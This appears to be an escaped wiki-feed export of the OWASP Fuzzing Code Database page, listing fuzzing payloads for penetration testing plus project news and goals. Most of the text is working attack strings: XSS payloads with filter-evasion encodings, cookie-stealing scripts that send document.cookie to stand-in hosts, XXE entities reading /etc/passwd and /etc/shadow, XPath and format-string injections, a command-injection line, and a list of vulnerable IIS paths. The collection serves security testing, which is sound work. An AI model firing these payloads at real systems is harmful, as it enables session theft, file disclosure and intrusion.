&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81045</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81045"/>
				<updated>2010-04-06T21:24:57Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Microsoft URLs (18 March 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
*Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)&lt;br /&gt;
*Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)&lt;br /&gt;
*Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)&lt;br /&gt;
*Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)&lt;br /&gt;
*Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)&lt;br /&gt;
&lt;br /&gt;
'''16 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)&lt;br /&gt;
*Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284) &lt;br /&gt;
*Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
*Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
=== Microsoft URLs (6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Microsoft IIS vulnerabilities and enumeration (6 April, 2009)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
/iisadmpwd/achg.htr&lt;br /&gt;
/iisadmpwd/aexp.htr&lt;br /&gt;
/iisadmpwd/aexp2.htr&lt;br /&gt;
/iisadmpwd/aexp2b.htr&lt;br /&gt;
/iisadmpwd/aexp3.htr&lt;br /&gt;
/iisadmpwd/aexp4.htr&lt;br /&gt;
/iisadmpwd/aexp4b.htr&lt;br /&gt;
/iisadmpwd/anot.htr&lt;br /&gt;
/iisadmpwd/anot3.htr&lt;br /&gt;
/iiasdmpwd/&lt;br /&gt;
/scripts/fpcount.exe&lt;br /&gt;
/scripts/cgimail.exe&lt;br /&gt;
/scripts/tools/newdsn.exe&lt;br /&gt;
/scripts/tools/getdrvs.exe&lt;br /&gt;
